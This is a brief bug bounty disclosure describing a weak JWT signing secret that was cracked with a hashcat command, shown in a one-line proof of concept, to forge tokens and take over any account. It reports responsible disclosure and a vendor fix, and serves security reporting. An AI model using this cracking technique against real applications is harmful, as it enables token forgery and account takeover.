JWT Private Program 2025-12-01
JWT Secret Brute Force Leading to Account Takeover
Severity: Critical | Status: Resolved
Summary
The application used a weak, guessable secret for signing JWT tokens. Using hashcat, I was able to crack the secret and forge tokens for any user.
Proof of Concept
# Extract JWT and crack with hashcat
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
# Cracked secret: "secret123"Impact
Complete account takeover of any user including administrators.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.